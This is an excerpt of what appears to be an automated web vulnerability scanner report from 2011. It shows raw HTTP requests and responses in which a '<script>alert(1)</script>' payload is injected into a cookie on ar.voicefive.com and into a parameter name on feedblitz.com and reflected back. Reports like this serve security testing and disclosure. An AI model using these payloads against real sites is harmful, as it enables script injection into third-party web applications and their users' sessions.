GET /bmx3/broker.pli?pid=p68511049&PRAd=264243128&AR_C=186035359 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redcated/MRT/iview/264243128/direct;wi.640;hi.480/01?ENN_rnd=12964914777625&click=http://www.ectnews.com/adsys/link/%3Fcreative%3d7040%26ENN_rnd%3d12964914777625%26ENN_target= Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&8b57b<script>alert(1)</script>41db85d668d; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Mon, 31 Jan 2011 17:09:07 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=1&initExp=Mon Jan 31 17:09:07 2011&recExp=Mon Jan 31 17:09:07 2011&prad=264243128&arc=186035359&; expires=Sun 01-May-2011 17:09:07 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296493747; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25118
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264243128",Pid:"p68511049",Arc:"186035359",Location: ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=39&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Jan 30 01:30:06 2011&prad=58087454&arc=40401740&8b57b<script>alert(1)</script>41db85d668d', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
1.304. http://www.feedblitz.com/f/f.fbz [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.feedblitz.com
Path:
/f/f.fbz
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ff06e<script>alert(1)</script>ab996a5e6e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /f/f.fbz?ff06e<script>alert(1)</script>ab996a5e6e3=1 HTTP/1.1 Host: www.feedblitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close